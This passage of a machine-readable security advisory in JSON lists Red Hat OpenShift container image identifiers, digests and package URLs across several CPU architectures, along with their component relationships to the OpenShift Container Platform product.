"name": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:5a8eedf55bdce3483fbad37f69a026a3d18b8f34ce9bf7bf7075ae28a385244d_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:5a8eedf55bdce3483fbad37f69a026a3d18b8f34ce9bf7bf7075ae28a385244d_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-operator-registry-rhel9@sha256%3A5a8eedf55bdce3483fbad37f69a026a3d18b8f34ce9bf7bf7075ae28a385244d?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773313312"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:f3348d2d5a03fcea547d437cdee0a412ae05e92d91c73fd864f06df6d0cf6e7c_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:f3348d2d5a03fcea547d437cdee0a412ae05e92d91c73fd864f06df6d0cf6e7c_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:f3348d2d5a03fcea547d437cdee0a412ae05e92d91c73fd864f06df6d0cf6e7c_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-agent-installer-api-server-rhel9@sha256%3Af3348d2d5a03fcea547d437cdee0a412ae05e92d91c73fd864f06df6d0cf6e7c?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773363720"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:358352e377bb3428a676e37d75c8194c5b321f871cb60612208baf074d5dd660_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:358352e377bb3428a676e37d75c8194c5b321f871cb60612208baf074d5dd660_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:358352e377bb3428a676e37d75c8194c5b321f871cb60612208baf074d5dd660_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-baremetal-installer-rhel9@sha256%3A358352e377bb3428a676e37d75c8194c5b321f871cb60612208baf074d5dd660?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773430219"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:3c8d94356ae95f6f20cdd4ff993855d3522e3dc7f6eb8212eaa45a3ca360ae92_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:3c8d94356ae95f6f20cdd4ff993855d3522e3dc7f6eb8212eaa45a3ca360ae92_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:3c8d94356ae95f6f20cdd4ff993855d3522e3dc7f6eb8212eaa45a3ca360ae92_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-baremetal-operator-rhel9@sha256%3A3c8d94356ae95f6f20cdd4ff993855d3522e3dc7f6eb8212eaa45a3ca360ae92?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773252335"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:9d2512cf69eb26236309098cccc8a79f6ddde8948975658423746a5c87d9b13b_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:9d2512cf69eb26236309098cccc8a79f6ddde8948975658423746a5c87d9b13b_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:9d2512cf69eb26236309098cccc8a79f6ddde8948975658423746a5c87d9b13b_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-kube-apiserver-rhel9-operator@sha256%3A9d2512cf69eb26236309098cccc8a79f6ddde8948975658423746a5c87d9b13b?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1772896477"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:9215463c548662202ddd125670b45d64f847595ffa540d6fe9cbb3482c5eabe0_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:9215463c548662202ddd125670b45d64f847595ffa540d6fe9cbb3482c5eabe0_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:9215463c548662202ddd125670b45d64f847595ffa540d6fe9cbb3482c5eabe0_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-gcp-pd-csi-driver-rhel9@sha256%3A9215463c548662202ddd125670b45d64f847595ffa540d6fe9cbb3482c5eabe0?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773747007"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:f532fe57b2214b4cd215af2d9d34bb77d46eca74ae6dc96e6b6ce3df16f19ed0_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:f532fe57b2214b4cd215af2d9d34bb77d46eca74ae6dc96e6b6ce3df16f19ed0_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:f532fe57b2214b4cd215af2d9d34bb77d46eca74ae6dc96e6b6ce3df16f19ed0_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-installer-rhel9@sha256%3Af532fe57b2214b4cd215af2d9d34bb77d46eca74ae6dc96e6b6ce3df16f19ed0?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773429934"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:0c07c89d2e6ed9ee9f484ab11623fb55f6d9d6328bb59ac475b6b26e354f2fa4_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:0c07c89d2e6ed9ee9f484ab11623fb55f6d9d6328bb59ac475b6b26e354f2fa4_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:0c07c89d2e6ed9ee9f484ab11623fb55f6d9d6328bb59ac475b6b26e354f2fa4_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-installer-artifacts-rhel9@sha256%3A0c07c89d2e6ed9ee9f484ab11623fb55f6d9d6328bb59ac475b6b26e354f2fa4?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773430140"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:2f6107770f1fb82e40997b8c8f1dae0408f1317422386b8ad4ebc6c79efbe797_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:2f6107770f1fb82e40997b8c8f1dae0408f1317422386b8ad4ebc6c79efbe797_ppc64le",
"product_id": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:2f6107770f1fb82e40997b8c8f1dae0408f1317422386b8ad4ebc6c79efbe797_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/kubevirt-csi-driver-rhel9@sha256%3A2f6107770f1fb82e40997b8c8f1dae0408f1317422386b8ad4ebc6c79efbe797?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773412620"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:49d30e3ca8d16ae71846bf12e11e2587df29d5c336b1c35cc4a30a80d655cf6e_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:49d30e3ca8d16ae71846bf12e11e2587df29d5c336b1c35cc4a30a80d655cf6e_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:49d30e3ca8d16ae71846bf12e11e2587df29d5c336b1c35cc4a30a80d655cf6e_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-config-rhel9-operator@sha256%3A49d30e3ca8d16ae71846bf12e11e2587df29d5c336b1c35cc4a30a80d655cf6e?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773174302"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:40b444fee41057654328f8d759492125f8ab93f80d937b00bd14f4f1c8426709_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:40b444fee41057654328f8d759492125f8ab93f80d937b00bd14f4f1c8426709_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:40b444fee41057654328f8d759492125f8ab93f80d937b00bd14f4f1c8426709_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-os-images-rhel9@sha256%3A40b444fee41057654328f8d759492125f8ab93f80d937b00bd14f4f1c8426709?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773699238"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:bdfe3cf241ac03b5c4003a9f9ee3e6369e4ecc298b9c6c9a7c24c9d938b06b1f_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:bdfe3cf241ac03b5c4003a9f9ee3e6369e4ecc298b9c6c9a7c24c9d938b06b1f_ppc64le",
"product_id": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:bdfe3cf241ac03b5c4003a9f9ee3e6369e4ecc298b9c6c9a7c24c9d938b06b1f_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/network-tools-rhel9@sha256%3Abdfe3cf241ac03b5c4003a9f9ee3e6369e4ecc298b9c6c9a7c24c9d938b06b1f?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773220410"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:3ae7b9aeee5cfbc483740ab12ccfea870058aec11062863bb390798ff3512715_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:3ae7b9aeee5cfbc483740ab12ccfea870058aec11062863bb390798ff3512715_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:3ae7b9aeee5cfbc483740ab12ccfea870058aec11062863bb390798ff3512715_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openstack-cinder-csi-driver-rhel9@sha256%3A3ae7b9aeee5cfbc483740ab12ccfea870058aec11062863bb390798ff3512715?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773746885"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:8493400910b85f1fa3fa320934ec2ba460410a5fa1e7271b749b833d3f246d4a_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:8493400910b85f1fa3fa320934ec2ba460410a5fa1e7271b749b833d3f246d4a_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:8493400910b85f1fa3fa320934ec2ba460410a5fa1e7271b749b833d3f246d4a_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-operator-framework-tools-rhel9@sha256%3A8493400910b85f1fa3fa320934ec2ba460410a5fa1e7271b749b833d3f246d4a?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773313364"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:3b5e83c1adca7d30285766393e2a20b7da8ad7a66f0e0f65121758bde6bab001_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:3b5e83c1adca7d30285766393e2a20b7da8ad7a66f0e0f65121758bde6bab001_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:3b5e83c1adca7d30285766393e2a20b7da8ad7a66f0e0f65121758bde6bab001_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ovn-kubernetes-rhel9@sha256%3A3b5e83c1adca7d30285766393e2a20b7da8ad7a66f0e0f65121758bde6bab001?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773173252"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:fe5541791393041c291dd0d3acb199292e6918b749ece264a9f9665109bd659d_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:fe5541791393041c291dd0d3acb199292e6918b749ece264a9f9665109bd659d_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:fe5541791393041c291dd0d3acb199292e6918b749ece264a9f9665109bd659d_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-powervs-block-csi-driver-rhel9@sha256%3Afe5541791393041c291dd0d3acb199292e6918b749ece264a9f9665109bd659d?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1772749336"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:c3a5e17391c03393841809dc48498309f0d5f0fceacd7665341a95f87d036fa2_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:c3a5e17391c03393841809dc48498309f0d5f0fceacd7665341a95f87d036fa2_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:c3a5e17391c03393841809dc48498309f0d5f0fceacd7665341a95f87d036fa2_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-tools-rhel9@sha256%3Ac3a5e17391c03393841809dc48498309f0d5f0fceacd7665341a95f87d036fa2?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773215336"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:622b16ed0cfdff14a82cc30ff4405866b97f14fb72a0e2392a3400e36292fc55_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:622b16ed0cfdff14a82cc30ff4405866b97f14fb72a0e2392a3400e36292fc55_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:622b16ed0cfdff14a82cc30ff4405866b97f14fb72a0e2392a3400e36292fc55_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ovn-kubernetes-microshift-rhel9@sha256%3A622b16ed0cfdff14a82cc30ff4405866b97f14fb72a0e2392a3400e36292fc55?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773183892"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:01fe42bef62e141999ec7b9a9863393a676ea4abafdd00d12a09df44c4eca8fd_amd64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:01fe42bef62e141999ec7b9a9863393a676ea4abafdd00d12a09df44c4eca8fd_amd64"
},
"product_reference": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:01fe42bef62e141999ec7b9a9863393a676ea4abafdd00d12a09df44c4eca8fd_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:18e39b1bb67719078fa3ec73db9bc28ebb70f675ecbda63a5b2beed58e833906_ppc64le as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:18e39b1bb67719078fa3ec73db9bc28ebb70f675ecbda63a5b2beed58e833906_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:18e39b1bb67719078fa3ec73db9bc28ebb70f675ecbda63a5b2beed58e833906_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:a3705e55c87d86e4c751cac5d17d63d5eb85fa4478d969dafe384c0cbcb5cfb4_s390x as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:a3705e55c87d86e4c751cac5d17d63d5eb85fa4478d969dafe384c0cbcb5cfb4_s390x"
},
"product_reference": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:a3705e55c87d86e4c751cac5d17d63d5eb85fa4478d969dafe384c0cbcb5cfb4_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:c667f68f7b59b61cd2b185393c670cb35b9c5f56cb8d417b9cb51d95ee0272b4_arm64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:c667f68f7b59b61cd2b185393c670cb35b9c5f56cb8d417b9cb51d95ee0272b4_arm64"
},
"product_reference": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:c667f68f7b59b61cd2b185393c670cb35b9c5f56cb8d417b9cb51d95ee0272b4_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:11f24e17e3fd1bcb25241c47d76bd3800593e9f4a493e7e545cbedcd1926da2d_amd64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:11f24e17e3fd1bcb25241c47d76bd3800593e9f4a493e7e545cbedcd1926da2d_amd64"
},
"product_reference": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:11f24e17e3fd1bcb25241c47d76bd3800593e9f4a493e7e545cbedcd1926da2d_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:2f6107770f1fb82e40997b8c8f1dae0408f1317422386b8ad4ebc6c79efbe797_ppc64le as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:2f6107770f1fb82e40997b8c8f1dae0408f1317422386b8ad4ebc6c79efbe797_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:2f6107770f1fb82e40997b8c8f1dae0408f1317422386b8ad4ebc6c79efbe797_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:4b6872dc40d53d4657492e3e25592e98f7300cc543dc16a6d58ae78b74781416_arm64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:4b6872dc40d53d4657492e3e25592e98f7300cc543dc16a6d58ae78b74781416_arm64"
},
"product_reference": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:4b6872dc40d53d4657492e3e25592e98f7300cc543dc16a6d58ae78b74781416_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:e162628148310e6bf86cdafe3d0d0ce36c7842a9a6567381b9d90acde4ae0544_s390x as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:e162628148310e6bf86cdafe3d0d0ce36c7842a9a6567381b9d90acde4ae0544_s390x"
},
"product_reference": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:e162628148310e6bf86cdafe3d0d0ce36c7842a9a6567381b9d90acde4ae0544_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:843593a17636af6b6dae5f0e172ee2590414d093b3c53a5e8ef65de050890424_arm64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/network-tools-rhel9@sha256:843593a17636af6b6dae5f0e172ee2590414d093b3c53a5e8ef65de050890424_arm64"
},
"product_reference": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:843593a17636af6b6dae5f0e172ee2590414d093b3c53a5e8ef65de050890424_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:bdfe3cf241ac03b5c4003a9f9ee3e6369e4ecc298b9c6c9a7c24c9d938b06b1f_ppc64le as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/network-tools-rhel9@sha256:bdfe3cf241ac03b5c4003a9f9ee3e6369e4ecc298b9c6c9a7c24c9d938b06b1f_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:bdfe3cf241ac03b5c4003a9f9ee3e6369e4ecc298b9c6c9a7c24c9d938b06b1f_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:f1daae683b8df5ea0e559e3acfdd53491bcf4fd589a129c70b77e6621480003e_amd64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/network-tools-rhel9@sha256:f1daae683b8df5ea0e559e3acfdd53491bcf4fd589a129c70b77e6621480003e_amd64"
},
"product_reference": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:f1daae683b8df5ea0e559e3acfdd53491bcf4fd589a129c70b77e6621480003e_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:f39bd18cd41526b1a7c11316b587246675331c87aae0307e43b6eb87a6674bb2_s390x as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/network-tools-rhel9@sha256:f39bd18cd41526b1a7c11316b587246675331c87aae0307e43b6eb87a6674bb2_s390x"
},
"product_reference": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:f39bd18cd41526b1a7c11316b587246675331c87aae0307e43b6eb87a6674bb2_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:1e6aa292e001c7241399cbf5ca290e8fd58be92f58b0f5d194ea4d5fd38db82c_amd64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:1e6aa292e001c7241399cbf5ca290e8fd58be92f58b0f5d194ea4d5fd38db82c_amd64"
},
"product_reference": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:1e6aa292e001c7241399cbf5ca290e8fd58be92f58b0f5d194ea4d5fd38db82c_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:29191caf2f01529eaac34d2f958b07c3998549def5918a38b5a4622c006e8fb4_s390x as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:29191caf2f01529eaac34d2f958b07c3998549def5918a38b5a4622c006e8fb4_s390x"
},
"product_reference": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:29191caf2f01529eaac34d2f958b07c3998549def5918a38b5a4622c006e8fb4_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:43bfff1dba401620d69e3e8c2ebbd661ccaef081b01a440d820027560d1ab148_ppc64le as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:43bfff1dba401620d69e3e8c2ebbd661ccaef081b01a440d820027560d1ab148_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:43bfff1dba401620d69e3e8c2ebbd661ccaef081b01a440d820027560d1ab148_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:a7cb08bfe6a43532c63adc5814799d5f05d9c70459522da53b86c625120ba27b_arm64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:a7cb08bfe6a43532c63adc5814799d5f05d9c70459522da53b86c625120ba27b_arm64"
},
"product_reference": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:a7cb08bfe6a43532c63adc5814799d5f05d9c70459522da53b86c625120ba27b_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:69b04e6d42b12ede1cdfdeebef7d8a76fe5eda20f29c5e99f26cb1e0bc98cf8e_arm64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:69b04e6d42b12ede1cdfdeebef7d8a76fe5eda20f29c5e99f26cb1e0bc98cf8e_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:69b04e6d42b12ede1cdfdeebef7d8a76fe5eda20f29c5e99f26cb1e0bc98cf8e_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:6cd0a2b56a3dcb79dc0e77d21460e502080936cd9bb72ffc0b9217834b2f2508_s390x as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:6cd0a2b56a3dcb79dc0e77d21460e502080936cd9bb72ffc0b9217834b2f2508_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:6cd0a2b56a3dcb79dc0e77d21460e502080936cd9bb72ffc0b9217834b2f2508_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:ada91f9ca5511960bf9186bbdf489e8702f5cd6b8dd3de904e99e4cd0cd27d02_amd64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:ada91f9ca5511960bf9186bbdf489e8702f5cd6b8dd3de904e99e4cd0cd27d02_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:ada91f9ca5511960bf9186bbdf489e8702f5cd6b8dd3de904e99e4cd0cd27d02_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:f3348d2d5a03fcea547d437cdee0a412ae05e92d91c73fd864f06df6d0cf6e7c_ppc64le as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:f3348d2d5a03fcea547d437cdee0a412ae05e92d91c73fd864f06df6d0cf6e7c_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:f3348d2d5a03fcea547d437cdee0a412ae05e92d91c73fd864f06df6d0cf6e7c_ppc64le",
